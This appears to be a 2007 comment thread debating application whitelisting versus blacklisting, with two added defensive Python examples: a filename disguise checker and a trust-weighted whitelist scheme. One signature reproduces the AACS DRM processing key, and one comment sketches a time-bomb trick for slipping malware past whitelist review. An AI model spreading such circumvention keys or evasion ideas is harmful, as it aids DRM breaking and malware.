I hate having stuff run on my box that I don't know about -- even benign or useful stuff. With NoScript I love having fine control over all the crap that sites want to run. I have gotten used to some sites needing to have components whitelisted before they work properly. I also love it that I can stop annoying flash from remote servers (this is why I downloaded NoScript). True, NoScript has given my wife headaches when it mysteriously (to her) blocks functionality, but I suggested she use Explorer instead of Firefox. She only goes to a few whitelisted sites anyway. If tools like NoScript start to become standard then I am all for it. In this world of increasingly sophisticated phishers and other creepy attacks, NoScript makes me happy.
"No fear. No envy. No meanness." Liam Clancy
- Let's invent a new operating system where processes in regular user space cannot alter resources belonging to other users (unless access is specifically granted.)
- Let's make this operating system so that the need for super-user access is limited.
- Let's have a generic toolset with this operating system by which the need to download trivial programs is minimized. (We must think of editors, file manipulation and systems management tools.)
- Let's invent a runtime environment so that foreign applications can run locally with very restricted access to local resources.
- Let's promote the notion that you should know what you do before doing it. And let's do this in clear and understandable language.
As MS clearly never thought of this, I should patent this idea and make huge loads of money. On the other hand, I have to do my hair and hence I have to set priorities, and patent applications come after the hair.
And maybe, just maybe, some genius thought of these things long before I did.
I hadn't the slightest objection to his spending his time planning massacres for the bourgeoisie... (P.G. Wodehouse)
The problem with a distributed solution is that the bad guys have control of multi-thousand machine botnets who will all say $BADAPP is the bee's knees and safe to run.
One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
I'd like to expand on my first post by pointing out a few ways for fighting malware that are the most freedom-friendly, encouraging users to make responsible decisions. These depend on OS vendors employing sane UI policies:
Do not engage in filename-mangling! If a file is named "apicture.jpg.exe" then it MUST be displayed that way and must not undergo any automatic alteration (falsification) that, for instance, makes an executable appear as data.
Additionally, all executable files are shown with a red warning flag whenever that filename is displayed by the desktop, file manager or file dialog. This is important, as Windows will execute files ending in ".com" and this suffix is a part of most websites the user trusts; clicking on a "monster.com" file is natural so another indicator is necessary to cut down on trojans.
Make web site scripting purely an opt-in affair by default. This goes for anything else the html engine is used for, like chat clients.
No more "Open this file" option in download dialogs. Period. If the user cannot manage opening the file themselves from the regular UI, then hopefully they will get stuck and sign up for an introductory computer class.
All true believers break their eggs at the convenient end.
And did you exchange a walk on part in the war for a lead role in a cage? - Pink Floyd.
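The first two display rules above (never mangle the name, always flag executables, and treat a trailing ".com" with suspicion), as an added example that is not the commenter's code: it classifies a filename by its final extension, which is what the shell will actually run, and builds the label a file manager or dialog should show. The extension lists are constructed and deliberately partial.

```python
"""Filename display rule (added example, not from the original post): show the
full, unaltered name, and flag anything runnable and any double-extension lure."""

# Extensions Windows will run directly (constructed, deliberately partial list).
EXECUTABLE_EXTS = {"exe", "com", "bat", "cmd", "scr", "pif", "vbs", "msi"}
# Extensions that read as passive data and are used as bait before the real one.
DATA_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx", "txt", "mp3", "zip"}


def classify(filename: str) -> dict:
    """Split on dots; the LAST piece decides how the OS treats the file."""
    _stem, *exts = filename.split(".")
    exts = [e.strip().lower() for e in exts]   # "file.exe " padded with spaces still runs
    real = exts[-1] if exts else ""
    executable = real in EXECUTABLE_EXTS
    return {
        "real_ext": real,
        "executable": executable,
        # 'apicture.jpg.exe': a data-looking extension in front of the runnable one
        "disguised": executable and any(e in DATA_EXTS for e in exts[:-1]),
        # 'monster.com': the runnable suffix doubles as a trusted-looking domain
        "looks_like_domain": real == "com",
    }


def display_name(filename: str) -> str:
    """The string a desktop, file manager or file dialog should show: the full
    name exactly as stored, plus an unmistakable marker whenever it is runnable."""
    c = classify(filename)
    label = filename                       # never hide or rewrite any part of it
    if c["executable"]:
        label = "\u26a0 " + label + " [EXECUTABLE PROGRAM]"
    if c["disguised"]:
        label += " [NOT A PICTURE/DOCUMENT]"
    if c["looks_like_domain"]:
        label += " [NOT A WEBSITE]"
    return label


if __name__ == "__main__":
    for name in ("apicture.jpg.exe", "monster.com", "holiday.jpg", "report.pdf.SCR"):
        print(display_name(name))
```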
I'm forced to use "Cisco Security Agent" by Corp, which blocks most programs that are not whitelisted and also limits what users can whitelist themselves. It is also "meant" to block viruses and malware, but it is not very good at that....
Gee, this scheme will work just about as well as it did on the XBox.
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
Remember SyGate and those other firewalls, where you would "whitelist" traffic.
Every geek would encourage non-geeks to install a firewall (the non-geeks knew it would protect them, after banging it in, but couldn't grasp the concept.)
However, the non-geek would "whitelist" everything because he got conditioned into thinking "I can't do what I try to do, until I click 'yes - remember'" and didn't understand what an "incoming request on port 1234" meant anyway.
I think we can keep recursing like this until someone returns 1
Whitelisted sites will get blacklisted... All that needs to happen is for some whitelisted computer to get taken over and become part of a bot-net/spam network. Then valid email will be sent from a whitelisted PC and accepted everywhere.
Considering the recent Storm Worm with an estimated 1 to 50 Million PCs as part of its bot-net, surely a few of those PCs would have been on a white-list somewhere.
Adeptus
No trees were killed in the making of this post; however, many trillions of electrons were horribly inconvenienced.
"According to Symantec, 'Internet security is headed toward a major reversal in philosophy, where a 'white list' which allows only benevolent programs to run on a computer"
...
Well DOH, is this the best that the security 'innovators' have come up with in 2007? How about a module in embedded hardware that runs a checksum on every executable and disables it if it fails the check. It would have an install mode and a run mode. Only executables that are installed can be run. The original DOS executable had a file for just such a purpose.
Incidentally, Marcus J. Ranum said this a long time ago in reference to Enumerating Badness; nice of Symantec to have caught up.
davecb5620@gmail.com
Because in practice almost all XP users run as admin, as do almost all Vista users.
Kinda negates permissions. XP as admin is just a pretty DOS. But hey, I know of Linux and Mac users who can't be bothered with limited user.
... and the day will come that your 'global whitelist' (which, if you thoroughly follow through boils down to the OS) has to be 'approved' (as it fits, by whitehouse.gov, not .org).
CC.
TaijiQuan (Huang, 5 loosenings)
and the "white list" philosophy is what Linux distributions generally use.
Specifically, I use Fedora. There are the standard repositories that hold software, and the repository is under peer review. I use some other repositories (livna, for example), and I trust those repositories as well.
(almost) All software comes from these repositories, which are, in essence white listed. Since I am a programmer, I install some things from source (tcc, redhat source navigator) that are not in the repositories, but those are white listed as well, and I have to keep up with security advisories on those pieces of software myself.
In a nutshell, all software I use is white listed by sites that I trust, and I don't install anything else.
But then, I am a Linux user, so I guess I am a bit of an early adopter.
Just another "Cubible(sic) Joe" 2 17 3061
I agree with what I believe you are saying.
However, the problem lies not in those who understand security, but in those who control budgets and make the policy decisions. I am sure I am not the only security person who has had his or her technically (and financially) sound recommendation overturned by a non-technical manager.
The people we need to consider here are those who make business policy decisions. Remember, these are the same people who insist on everything being Microsoft and who believe everything that Gartner's analysts say.
Everyone seems stuck in the context of web browsers for some reason... In the Microsoft world, at least, IE7+Vista actually has a pretty secure design. A whitelist isn't going to be intended to stop flaws in the software--rather, it's intended to manage computer-related problems due to flaws in the human brain.
Unfortunately, it's just not workable without a pretty big shift in the way we think about computers. They have to stop being "general purpose" devices. We're talking about going to a cross between WebTV and personal computers, here, and that's a scary thought.
I still think that a license to use the Internet is what's in order. Remove a person's license, and if they still cause problems on the network, fine them.
Isn't this similar to what many linux systems do with their packages and synaptic?
Form an official international non-profit organization or something of the sort (something like the IEEE, ISO, etc.) where you would submit the source code of your software before you release it (same goes for newer versions). The organization will be bound by a confidentiality agreement if the project is not open source, so that it doesn't reveal the code to any third parties. In that case, you may also have to pay a small fee to keep the organization going, but it should be something even small companies can afford.
So the people of the organization get your code, decide if it is malicious or not, and if not, add it to the whitelist so that any computer may run it. Maybe one should have the right to appeal in case of ambiguous cases. The list is open for all computers to access through the internet, so that all PCs "know" what is allowed and what isn't.
How do you like that?
The problem with your idea is there is no whitelist committee where MS can help establish and exert their influence to make sure their products get on the lists and any competitive software does not (or takes a whole lot longer to do so). Because we all know Windows MUST have IE embedded for better security.
:-)
Anyway, if they fixed the OS the way you suggested, how can MS tout having improved security version after version?
"Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
Yeah, you teach him how to set up a chroot jail for his browser is how.
Please stop stalking me, bro.
In other words, I want my content to support like minded quality content, not the legal or illegal versions "quick make-a-buck and to hell with ethics" crowd.
...Open Source isn't the only answer -- but it's almost always a better value than the alternatives...
GEEK: It sets up the chroot jail or it gets the hose.
N00B: [sobbing hysterically]
GEEK: Yes, it will, Precious, won't it? It will get the hose!
N00B: Okay... okay... okay. Mister, if you let me go, I won't - I won't press charges I promise. See, my mom is a real important woman... I guess you already know that.
GEEK: Now it places the browser in the chroot jail.
N00B: Please! Please I wanna go home! I wanna go home please!
GEEK: It places the browser in the chroot jail.
N00B: I wanna see my mommy! Please I wanna see my...
GEEK: Put the fucking browser in the jail!
Please stop stalking me, bro.
Antivirus companies will find they no longer have to review software, they can just charge a fee for "express certification", and make the regular process slow and cumbersome. This will greatly reduce the costs, and - most importantly - the technical expertise needed to develop antivirus software.
Hackers will find out that they can now pay for certification, all they need is to use one of the 8500 identities and credit cards they compromised last week to pay for their next trojan. This will, in turn, require them to steal more credit cards and identities.
Open Source developers will find it expensive, slow and difficult to get their programs certified. There will be far fewer open source programs developed.
I'll bet Microsoft loves this solution.
The real solution is a better O/S design. Microsoft refuses to do this. Running "all programs as root" by default - should qualify for criminal negligence on their part. There was a site called "ddos-ca.org" that was organizing a class action lawsuit against Microsoft for failing to provide security. Within 2 months of a public interview on Canadian TV, Microsoft shipped a "Windows Firewall" patch to the O/S.
Impartial to open source apps! Right!
A whitelist system like this will no doubt need to be run by an "authority," a.k.a. the manufacturers and distributors and will amount to granting total control over what programs can be run and what tasks can be performed to those companies. Permitting end users to whitelist programs will certainly not achieve the desired security results, as, whatever restrictions, warnings and checks we perform, we'll still face the "just click yes" problems associated with running dangerous content in web browsers.
Instead, we'll see a situation like that in the mobile phone industry which has begun requiring centralized (and slow and expensive) reviews of every version of a program that will run on a phone (see the latest Symbian release's signing program which doesn't even permit the user to authorize use of GPS data unless approved by the service provider and manufacturer). Far from being fair to open source, this would cripple the ability of individuals to code their own programs and remove any notion that one's own computer is meant to do whatever one tells it to do.
Just as in Trusted Computing -- which, of course, is the only viable method for enforcing restrictions necessary for such a whitelist -- this makes computers not the personal tools of the individuals who own them but instead the slave nodes of whatever entities currently hold power in the industry. What a wonderful scenario. All for the price of malware reduction (just don't install the damn screensaver people!), we're willing to turn our general purpose computers into hunks of plastic just as dumb as the iPhone.
I, for one, don't want to buy $2000 desktop iPhones at gunpoint just to browse the web.
To be honest, with the current state electronic mail is in now, I'd like all the major mailers to have a whitelist of digitally signed domains whose e-mails shall be accepted, and whose accounts should be uncompromised.
I know it's extreme, technically impossible to implement and will piss off millions, especially domain owners, but spamming, and phishing and all sorts of internet crime attacks do play a major role in the worldwide modern economy.
After one flippant response I am now thinking this is a VERY reactive measure, similar to a triage after a disaster, so what Symantec is saying is Windows is such a mess that we can't rely on patches to the OS anymore, and we have to set up an OS 'police state' to keep bad programs out because we don't have the adequate resources or skills to detect or prevent bad stuff from happening inside. So instead of deploying your systems in a productive environment you would be just managing a disaster area.
As I posted in the other response I could see this easily become an opportunity for MS to get on a "Whitelist Committee" to make sure their stuff is approved and any competition is either barred, hobbled, or severely delayed from approval to the whitelist (with OSS software being automatically labeled as a potential threat as the code can be modified and recompiled by anyone).
All and more, because MS either is unable or unwilling to secure Windows to a level similar to what Linux and OS X have.
"Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
What if I like reverse-engineering malware? What if I write my own code? What if I don't want to trust programs trusted by other people?
White-listing must be in the hands of the individual. You might be interested in this - Disk Firewall with application verification. It does not control the whole OS, but with this tool you can protect your sensitive data from being accessed by malware.
I think this has a similarity with SELinux - you define which programs are allowed to use certain resources, and everything else is prohibited for them.
If I can't add a program to the whitelist myself, I don't want it.
All it will take is for one rogue program to rewrite the whitelist. So the whitelist is at Symantec's site? Great, what happens when Symantec is hacked? How do you get your computer to work when your internet connection is down?
Far better would be giving your programs and libraries human readable names! Right now I'm in Windows at work, and Windows' task list lists "Internet Security Moving Toward 'White List'" as a program, instead of Internet Explorer. So you Windows users will all have to downgrade from XP to Vista. Access is also running, it's called... OK it's called the name of an application I wrote. Windows Explorer is named after the folder it's showing.
Processes are all non-readable gobbledygook; shstat.exe, dpmw32.exe, etc. A few you can figure out, but most are ciphers. Windows hasn't had the 8.3 limitation in well over a decade now, why in the hell aren't DLLs given English names? I can't stop a process if I don't know what it's for, or I may hose the whole system and cause a cold boot.
If Symantec serves the whitelist, how in the hell are you supposed to write your own programs?
What's to stop me from writing a virus called IE.exe?
And finally, when did they start smoking crack at Symantec?
-mcgrew (not the mcgrew from McGrew Security)
Exactly. It is a fallacy to think that a whitelist is less trouble than a blacklist. At the rate that MS machines get screwed up, the whitelist will never be up to date, and being a 'good' list, a wrong entry in a whitelist is much more damaging than a wrong entry in a blacklist.
A blacklist fails safe.
A whitelist fails with tragic consequences.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
Sorry, I'm not apt to trust anything said by a rep of the company that makes the abomination known as Norton Internet Security. NIS itself should be classed as a virus!
2017, The Free Republic of the Founding Fathers, The Free Capital City: The President today announced the formation of the Whitelist Committee. After years of deliberations, the criminologists decided that the blacklist approach to security is not effective. Instead of catching criminals after they committed a crime (the blacklist approach), the government will now analyse the brains of newborn babies and have the Whitelist Committee decide whether they deserve to live. If chemicals associated with aggressiveness, e.g. testosterone, are found in larger than allowed quantities, then these babies are going to be killed to save the society from having to catch them when they commit a crime. Babies that are found to have tolerable testosterone levels will be tagged with an RFID implant for life and be allowed to live in our wonderful society. To guarantee against misidentifications, the Whitelist Committee will also put another implant in the baby's heart that will allow the government to remotely stop the heart of any person who was allowed to live by mistake. This, the president announced, is going to lower the costs of the corrections system, so that more funds can be directed to the never-ending War on Thought.
To distill: When you implement a whitelist, the people who have control over it become your absolute masters. You must be very careful with whitelists, because if they are mismanaged or used for reasons other than security then you end up screwed.
I try to follow the money.
I understand why the Symantec shill said what he said, and that is understandable.
A white list on my machine I control is one thing.
A white list controlled by Symantec is something I wouldn't touch with a 10 foot pole, let alone load.
While they seem to be talking about client-side stuff in TFA, I think the title is a little misleading. Internet security is already a whitelist, since SSL certs are basically a whitelist. TFA is talking about PC security in general.
Self-referential Sigs are cool on /. these days...
I've been using a whitelist system for email for over two years and I love it. Though I don't know how that will work for everything else.
This just isn't right, at all!
White-lists only work for smaller things, such as trusted websites, but white-listing programs?
What about the countless in-house network programs people create, or little things to help users post on their favorite forum, programs to check your mail and so on, this would be totally unfair to them!
The only way this could possibly work would be to white-list programs, and disallow everything else by default, but ASK you if you would want to run it, and possibly even allow a scan of the program to be sent back to them so they can check it and verify it and add it to their white-list if all's okay with it.
But even then, this is still nuts; it's web browser vendors (yes, EVEN Mozilla, who seem to be placed on a golden pedestal in "everyone's" head) and Microsoft who are at fault for not taking necessary precautions for those who don't know much about computers.
For one, having extensions hidden by default was the most idiotic thing Microsoft have EVER done, even worse than ActiveX, even worse than IE's mangled understanding of web standards.
Holy crap, whats with this captcha?! http://images.slashdot.org/hc/49/bdb4db85edef.jpg
The white-listing idea is just like Capabilities. That's the sort of security users really need. Security with Capabilities can be mathematically provable.
You, the average /. reader, already have a whitelist of sorts. At least informally. Do you install everything that is potentially executable on a computer? No? I'd say you are using a whitelist then.
OK, moving on to Grandma or Aunt Sally. How the heck are they supposed to tell the difference between an application written by Microsoft and one written by the Russian Mob(tm)? One is an instant messenger tool that communicates with the world, the other is an instant messenger tool that also steals passwords. Assuming equal external functionality, who is to say one is good and one is bad?
At the "user" level without a knowledgeable administrator, something like this has to be done. It has nothing to do with security - because if you leave the security decisions to a user that doesn't know the difference, bad decisions will be made. And once you install a compromised application it is over - you have no security.
Sure, in a properly-sandboxed environment it might be possible to limit the damage from such an application. But, even on Linux there are applications that must be given authorization beyond that of an ordinary user. How would Aunt Sally figure out that this application asking for increased authorization should not get it? Who does she call to ask if this is a "good" application or a "bad" application?
The clear answer is that for the bulk of the personal computer user community there must be an administrator of last resort. And a whitelist of applications would certainly fulfill that requirement.
The only question is how many hoops does one have to jump through to get their application on the list?
Let's say we have very strong white listing enabled and each executable program must be signed by three independent third parties or it can't run. Say I'm a virus writer. So what do I do to get around this? Easy. I place a timer in my code so that it acts nice for 6 months, but when the time comes it trashes your system. A "time bomb" will pass white listing unnoticed.

There is only one way to counter this: Open Source. The people who sign off the code need to be able to inspect it line by line, and they need to inspect any linked-in libraries (DLLs) line by line, and the compiler too. Only after careful inspection can they know there is no time bomb. Even then they can't be 100% sure, because it might be hidden. In fact, hiding it even in open source would be easy.

So what to do? Go back to your Computer Science 101 class and re-read the text book. Basically the OS should never grant more privilege to a program than it needs. Do this at the finest level of granularity you can and that's it. So, for example, a word processor should not be allowed to alter any file except a text document that is marked as "writable" by the user running the word processor. There are all kinds of ways to do this, but the basic rule is to restrict what a program can do. The problem with Windows is the granularity is too big, that and that most dumb users run with an admin account.
The whole argument about needing stuff like
Have gnu, will travel.
According to Marcus Ranum, "world-renowned expert on security system design and implementation" and "an early innovator in firewall technology, and the implementor of the first commercial firewall product" (http://www.ranum.com/stock_content/about.html), white-listing was the way it should have been done since the start. In fact, black-listing (or as he calls it, "default permit") is at the top of his "The Six Dumbest Ideas in Computer Security" list (http://www.ranum.com/security/computer_security/editorials/dumb/).
It really isn't a matter of preference. It's a nod to the fact that viruses can mutate at lightning speed, and that there is a huge number of malware to be added to software.
Trying to ban software once it is found to be corrupted is a losing game eventually. You can never get the first couple of instances unless they end up being downloaded first by researchers, and then there are a few that get installed before they have been discovered.
With a whitelist approach, it becomes much more difficult to sneak one by the systems as they would have to get approval from somebody to run. A proper system would allow for the user to click through to install it anyway if they were sure that the software was legit. Preferably having the system do some sort of signature check for approved software first.
Yes it is a bit cumbersome, but it isn't anywhere near so as individually banning each program that becomes infected.
Speaking very generally, whitelists are an excellent way to go, and blacklists are impossible (read point #2).
The trick with whitelists, of course, is who maintains them and how. I'll bet the thought of the software using a single whitelist published exclusively by Symantec, is making a lot of small developers nervous.
I recommend some kind of distributed reputation system, possibly based on an OpenPGP WoT model (yeah, I always pimp the OpenPGP WoT; I must sound like a broken record) where many people can publish lists. (And if Symantec wants to ship the product set to just use their list by default with 100% trust, that's ok. Although it might be neat to have it, say, trust Debian's list too. :-) ) Then let the user decide who he trusts and how much he trusts each one, and if something isn't on the list or its trust is below some user-set threshold, then he gets a prompt explaining the situation, and asking what to do about it.
Yes, that prompt will confuse some people. I hear lots of horror stories about Vista being hard-to-use because of these types of things. But if the alternative is executing Malware...
But people still need to stop using applications that easily execute foreign code. There's no excuse in 2007 for clicking on a link in a web browser, or clicking an attachment in an email, being a potentially dangerous action. The AV companies shouldn't still be in business in the first place, and the whole premise behind scanning executables against a blacklist or whitelist, is that something has already gone terribly, terribly wrong.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
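The distributed reputation scheme proposed in the post above, as an added example that is not the commenter's code or any vendor's product: several publishers sign lists of program hashes with verdicts, the user assigns each publisher a trust level, and a program runs only when the trust-weighted score reaches a user-set threshold; a "bad" verdict from a fully trusted publisher blocks outright, and anything else gets a prompt listing who said what. Publisher names, keys and lists are constructed, and OpenPGP signatures are replaced by HMAC over the serialized list as a hypothetical stand-in.

```python
"""WoT-style distributed whitelist reputation (added example, not the original post's
code). OpenPGP list signatures are simulated with HMAC, a hypothetical stand-in."""
import hashlib
import hmac
import json

# How much weight a verdict carries, by the trust the user assigns the publisher.
TRUST_LEVELS = {"full": 1.0, "marginal": 0.5, "none": 0.0}


def program_hash(code: bytes) -> str:
    """Programs are identified by content hash, so a changed binary is a new entry."""
    return hashlib.sha256(code).hexdigest()


def publish_list(publisher: str, key: bytes, verdicts: dict) -> dict:
    """A publisher signs a mapping of program hash -> 'good' | 'bad'."""
    body = json.dumps(verdicts, sort_keys=True)
    sig = hmac.new(key, body.encode(), "sha256").hexdigest()
    return {"publisher": publisher, "body": body, "sig": sig}


def verify_list(signed: dict, key: bytes):
    """Return the verdicts if the list signature checks out, else None."""
    expected = hmac.new(key, signed["body"].encode(), "sha256").hexdigest()
    if not hmac.compare_digest(expected, signed["sig"]):
        return None
    return json.loads(signed["body"])


class UserTrust:
    """The user's side: which publishers they know, how much they trust each,
    and the score a program must reach to run without a prompt."""

    def __init__(self, threshold: float = 1.0):
        self.threshold = threshold
        self.keys = {}    # publisher -> verification key
        self.trust = {}   # publisher -> 'full' | 'marginal' | 'none'

    def add_publisher(self, name: str, key: bytes, level: str) -> None:
        self.keys[name] = key
        self.trust[name] = level

    def evaluate(self, phash: str, lists: list) -> tuple:
        """Return (decision, score, reasons); decision is 'run', 'block' or 'prompt'."""
        score, reasons = 0.0, []
        for signed in lists:
            name = signed["publisher"]
            if name not in self.keys:
                reasons.append(f"{name}: unknown publisher, ignored")
                continue
            verdicts = verify_list(signed, self.keys[name])
            if verdicts is None:
                reasons.append(f"{name}: signature invalid, list ignored")
                continue
            verdict = verdicts.get(phash)
            if verdict is None:
                continue                     # this publisher has no opinion
            weight = TRUST_LEVELS[self.trust[name]]
            reasons.append(f"{name} ({self.trust[name]}): {verdict}")
            if verdict == "bad":
                if weight >= 1.0:            # a fully trusted 'bad' wins outright
                    return ("block", score - weight, reasons)
                score -= weight
            else:
                score += weight
        if score >= self.threshold:
            return ("run", score, reasons)
        return ("prompt", score, reasons)    # below threshold: explain and ask


if __name__ == "__main__":
    user = UserTrust(threshold=1.0)
    user.add_publisher("Symantec", b"sym-key", "full")
    user.add_publisher("Debian", b"deb-key", "marginal")
    user.add_publisher("Friend", b"fri-key", "marginal")
    editor, game, bot = (program_hash(b) for b in (b"editor-1.2", b"game-0.9", b"bot"))
    lists = [
        publish_list("Symantec", b"sym-key", {editor: "good", bot: "bad"}),
        publish_list("Debian", b"deb-key", {editor: "good", game: "good"}),
        publish_list("Friend", b"fri-key", {game: "good"}),
    ]
    for h in (editor, game, bot):
        print(user.evaluate(h, lists))
```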
But something like:
---
I see that this is executable content from someone you have no trust relation with. Please DON'T run this: OK Continue.
You have continued, and possibly don't understand the implications of your actions. I will save the program to disk, and you will have to open a command line, and execute it manually. Save Cancel Continue
So you really want to run this program. We will first download the program, quarantine it, install or update your virus and trojan checker after the quarantine period (default is 1 week), check the software and then (if it passes), run it. Would you like to continue? Cancel Continue
Software has been quarantined. You will be reminded next week.
---
I believe that should work for most computer users I know.
Just another "Cubible(sic) Joe" 2 17 3061
Essentially your post distills down to "People who 'knew' assumed that the great unwashed masses were essentially stupid and lazy." It is not called "dumbing down" without reason. Note that the assumptions I am about to talk about are not ascribed to you, but to the industry as a whole.
People are too stupid to understand SSL so we dumb it down to a padlock.
People are too stupid to understand public and private key encryption so we don't use it.
People are too stupid to understand how to write in plain text, so we need HTML mail to put pretty colors and backgrounds on it.
People are too stupid to understand how or are too lazy to copy and paste URLs from email so we need to make emails convert URLs to clickable links. Same thing for attaching content.
People are too stupid to know what filenames are so we dumb it down to not show extensions.
People are too stupid or lazy to save an attachment and then execute so we make it automatically happen.
All these assumptions and more are fundamentally flawed as well as largely responsible for the so-called internet security problem described above. How many problems are due to the "honor virus" (do this and this and this, delete this)? How many emails go out from admins saying "this is infected, don't open the attachment" followed by a flood of that attachment telling the admin who did in fact open it? Far too many. Why is it?
It is because of the assumption that users are dumb/lazy, and that they should bear no responsibility for learning things. Part of it is a side-effect of government school structure - it creates an atmosphere that learning is a school thing, not an everyday thing. Part of it is elitism, mixed with a part of "let's take pity on people and not make them learn things". An odd and dangerous combination.
Symantec and its ilk are essentially a form of police force. Allegedly there for your protection, but ultimately when the mugger sticks a knife or gun in your face, it is you who is responsible for defending or protecting yourself. A "whitelist" or "list of applications we approve of or were paid to allow" is essentially throwing in the towel.
If this were applied elsewhere, what would the implications and effects be?
Instead of a no-fly list we'd have a "can fly" list.
Somehow that doesn't seem right. Neither does an "approved to run" list. Before someone compares this to port "default deny" or login "default deny", consider this analogy.
You determine who you allow in your house. This is like blocking ports.
Now imagine someone else telling you who you can allow in or not. This is "Symantec et al. moves to a whitelist". Well, what if you can add people? Ok, but if you are not smart enough to decide on your own who to allow in, how the hell can you be trusted to add people to the list they provide?
To bring that back, can the user add applications to the Symantec approved list? If so, how long before the email telling people "do this then this then this" comes out where the first steps are to add their app to the whitelist? How long before that becomes scriptable?
Ultimately the problem lies in poor assumptions. Assumptions based on the end user being a lesser being, and assumptions that "things will be ok" or that others will step in and protect bad code.
Technology is increasingly becoming more complex. If society does not adapt and learn with it, we are doomed to be felled by it in some fashion. The rampant abuse of the above assumptions and the resulting damage is almost a hidden result. We don't want to have to train users, so we dumb down software to make it "easy". The result? Instead we spend that money on billions and billions of dollars on software to make up for the problems of dumbing things down, and making them "so easy".
And we still spend billions of dollars a year on training for that allegedly easy to use, intuitive, and simple software that causes so much additional work, insecurity, and damage.
IMO we need to understand that the only intuit
My Suburban burns less gasoline than your Prius.
I've been saying this for years. It makes perfect sense. The number of applications you want to run on your computer is next to nothing compared to the hundreds of thousands of spyware, virus, bots, and every other undesirable program out there. One step closer to "hack proof" if you ask me (not that we can ever make something 100% hack proof).
~Vexed and loving it!
Whitelisting an entire app is too coarse-grained. We need to be able to whitelist the actions that a specific app can take. For example... by default, microsoft word should only have read-only access to its own files and library files needed to run. It should have no net access whatsoever. It should have no access to any of my personal data files. It should have no access to my keyboard when I'm typing in another app. It should have no access to drawing on any portion of my screen outside its own window. It should have no way to spoof another app's name in the window titlebar. It should only have read/write access to the single file that I click "open" on to edit.
Since I have to choose the files I want to work with in a file open dialog anyway, we force microsoft word to use a system-wide, trusted file open dialog which is the only way to grant it access to more files.
See http://plash.beasts.org/ and http://www.eros-os.org/essays/capintro.html
I develop small applications for myself and my company on nearly a weekly baises. Most of these apps just do some minor repetitive operation. Is Symantec suggesting that I need their approval before running my own code?
How would something like this apply to byte code like Java or .Net? In many cases it's the VM that's actually running.
The only workable solution I can see is having some dialog box that pops up asking the user to whitelist some application -- and we know how well asking the user to make an informed decision works.
- I voted for Nintendo and against Bush
This is a silly idea. I do not believe it could ever work well for developers, although it might be okay for certain "mainstream" home users, who will never use anything that is not bundled or off-the-shelf.
The fairness aspect is a good point. Whose programs get tested? There are far too many coming out every day to test them all... there are far more "whitelist" programs than there will ever be "blacklist" programs. So what is really gained here?
Developers in particular are constantly trying new things (and I mean NEW as in "yesterday"), and could not possibly wait for all their tools and scripts to go through an arduous "whitelist" test before use... assuming they ever made it to the testing phase.
No, pardon me, but this idea is far too similar to the bizarre idea of testing every citizen thoroughly to make sure they are NOT a criminal, before they are allowed to drive or get a job. That simply would not work... there are too many people, and most of them are not criminals. Same with this idea. Won't work in practice. The whitelist would have to be vastly larger than any blacklist that will ever be built.
The point of certificates is that you are supposed to be paying attention to the domain.com address you are connecting to in the first place, not blindly trusting wherever the links take you. But many people these days do not even know what the address bar is for: they type "www.yahoo.com" into the MSN search field, and consider the address field to be gibberish because no one introduced them to it.
Certificates mean that you can tell the "etrade.com" you are trying to reach is real, with no hijacked address or MITM eavesdropping. That is all.
And that is all that's necessary IF you pay attention to the domains that appear in your address bar. Implicitly trusting everyone with a certificate isn't necessary; all the certificate means is that the DOMAIN is what it says.
Beyond that, you still have to be discerning in which addresses you decide to connect with.
This is a much more insightful comment than appears on the surface.
Windows is the standard-bearer of personal computing culture. That being the set of expectations that allow people to buy their own computer, then add 3rd-party drivers and applications at will. (And yes, I know that Apple had that basic formula before MS.) Without the PC business model, what we are left with is a mainframe culture: Central authority decides what you can run.
The PC plays a critical role in electronic freedom, and Windows' poor engineering (among other factors) is putting it all in jeopardy. If the Desktop Linux people get a clue, we can step in and fill the gap. But it will have to involve more than selling the idea of glorified thin clients.
employing that 'philosophy' and advise everyone and my clients against that.
first of all, harmful programs are far fewer in number than beneficial programs. so it's just stupid to hoard long lists of 'whitelisted' programs, taking up space, and eventually memory, processing power, unless there is a motive behind that.
the only motive i can see is that symantec wants to cash in on the payments of software companies that would want their programs put on that whitelist.
we have so many robbers around in the email spam filter scene employing similar schemes, and i personally won't tolerate another wise-ass move bringing the same crap to the software world.
just ditch it symantec. it will harm you. ah, also fire whatever idiot came up with that 'bright' idea.
Read radical news here
whitelist, blacklist, whatever. Their products are always going to be horrible. Norton internet security is the "vista" of internet security. On every PC that runs Norton, all I've seen is massive slowdown. It's gotten to the point where I literally cringe whenever I see that yellow "Norton" in the taskbar right next to the system tray. this is the main reason why I don't use any anti-virus/internet security programs anyway. They are VERY resource hungry and it's rather pointless, because I have enough experience to know what is malicious and what isn't. ok, and before I get replies saying "switch to Linux," I plan to right when I build my new PC.
Uhm, so basically what they are saying is that one should only run code from sources you trust? Gee, I would never have thought of that... The problem with web-pages and scripts and applets is that you sometimes want to run un-trusted code with limited privileges. That is solved by privilege separation and making sure your interpreter / virtual machine is free from vulnerabilities and won't leak sensitive data. Have a guess which bit is the tricky part...
Whitelisting works for consoles. ;) I think whitelisting will work for computing devices that aren't meant to be used as high-powered general-purpose computers; or for devices that could be a serious target.
For example, I might stick a device on my nightstand JUST for web browsing. Being whitelist-driven, I don't have to worry about babysitting it like I babysit my Macs and Wintels.
No, I will not work for your startup
Will a new whitelist technology be more secure than what exists now? That has entirely to do with how it is implemented and used. If the whitelisting software has flaws, it will be exploited. And if the end user has any input at all, they can still make bad decisions.
One can imagine a series of white lists stacked on top of each other, allowing one to allow one to allow one to allow one to allow some code to run. Has security been increased? Isn't the general thought that the more links in a chain, the more likely there is to be a weak one?
Build a man a fire, he's warm for one night. Set him on fire, and he's warm for the rest of his life.
Let me admit something:
